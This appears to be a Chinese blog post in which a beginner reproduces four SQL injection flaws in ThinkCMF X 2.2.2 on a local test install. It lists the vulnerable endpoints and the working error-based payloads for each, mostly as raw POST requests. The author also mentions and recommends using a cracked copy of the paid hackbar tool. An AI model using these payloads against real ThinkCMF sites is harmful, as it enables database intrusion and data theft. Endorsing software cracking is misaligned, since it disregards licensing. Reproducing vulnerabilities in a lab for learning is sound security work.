前言
对网络安全恋恋不忘,于是周末又折腾了一遍。作为初学者,挖洞是不敢想的,只能找别人写过的漏洞复现下。特此记录。
漏洞说明
ThinkCMF是一款基于ThinkPHP+MySQL开发的中文内容管理框架,其中X系列基于ThinkPHP 3.2.3开发,最后更新到2.2.2版本。
存在多个漏洞。这里复现了全部。
工具
hackbar
谷歌浏览器
火狐浏览器
xdebug
复现过程
-
构建环境。
下载地址如下:
https://github.com/thinkcmf/cmfx/releases
安装后如下图。
image.png
-
安装hackbar
这里最主要的工具是它。该工具最新版需要收费。建议安装低版本或者使用破解的。
这里我选择了破解。
破解思路:
image.png
- 漏洞1
http://127.0.0.1/cmfx/index.php?g=portal&m=article&a=edit_post
POST: post[id][0]=bind&post[id][1]=2 and updatexml(1, concat(0x7e,user(),0x7e),1)-- -
前台文章编辑处存在漏洞。构造下面的请求即可。
image.png
- 漏洞2
后台管理那里,幻灯片的删除存在漏洞。
http://127.0.0.1/cmfx/index.php?g=Admin&m=slide&a=delete
POST: ids[]=1&ids[]=0 and updatexml(1, concat(0x7e,user(),0x7e),1)
image.png
- 漏洞3
导航编辑
http://127.0.0.1/cmfx/index.php?g=Admin&m=nav&a=edit_post
POST: parentid=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
image.png
- 漏洞4
评论审核那里
http://127.0.0.1/cmfx/index.php?g=Comment&m=commentadmin&a=check&check=1
POST: ids[]=1&ids[]=2 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
image.png
- 相关文章
https://blog.csdn.net/weixin_33924770/article/details/86031193
网友评论